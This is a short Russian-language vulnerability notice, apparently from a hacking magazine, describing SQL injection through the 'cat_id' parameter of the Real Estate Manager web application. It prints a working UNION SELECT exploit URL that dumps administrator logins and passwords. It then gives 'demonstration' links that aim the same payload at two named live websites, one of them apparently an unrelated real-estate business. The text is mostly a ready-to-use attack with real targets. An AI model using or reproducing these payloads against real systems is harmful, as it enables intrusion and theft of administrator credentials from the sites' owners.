Хакер #305. Многошаговые SQL-инъекции
Программа: Real Estate Manager
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «cat_id». Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Эксплоит:
http://localhost/path/?lang=en&tpl=default&mode=browse&cat_id=-1 UNION SELECT
concat(login,0x3a,password) FROM realestate_admin--
Демонстрация:
http://realeastatephp.net/demo/?lang=en&tpl=default&mode=browse&cat_id= -1
UNION SELECT concat(login,0x3a,password) FROM realestate_admin--
http://draz-nekretnine.com/realestate/realestate-index.php?lang=en&tpl=default&
mode=browse&cat_id=-1 UNION SELECT concat(login,0x3a,password) FROM
realestate_admin--